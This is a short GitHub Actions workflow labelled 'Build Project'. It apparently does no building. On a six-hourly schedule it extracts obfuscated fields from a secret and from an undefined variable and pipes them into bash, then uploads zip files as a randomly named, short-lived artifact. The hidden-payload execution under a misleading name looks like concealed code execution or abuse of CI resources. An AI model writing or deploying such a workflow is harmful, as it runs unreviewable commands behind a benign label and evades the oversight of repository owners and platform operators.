name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '12 4,10,16,22 * * *'
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  service:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run
        env:
          k21: ${{ secrets.k21 }}
        run: |
          printf '%s' "$k21" | jq -r .qq5277 | /bin/bash
          printf '%s' "$grp4" | jq -r .q40572 | /bin/bash

      - name: Save archive
        uses: actions/upload-artifact@v4
        with:
          name: gk2yHvs2
          path: "*.zip"
          retention-days: 1
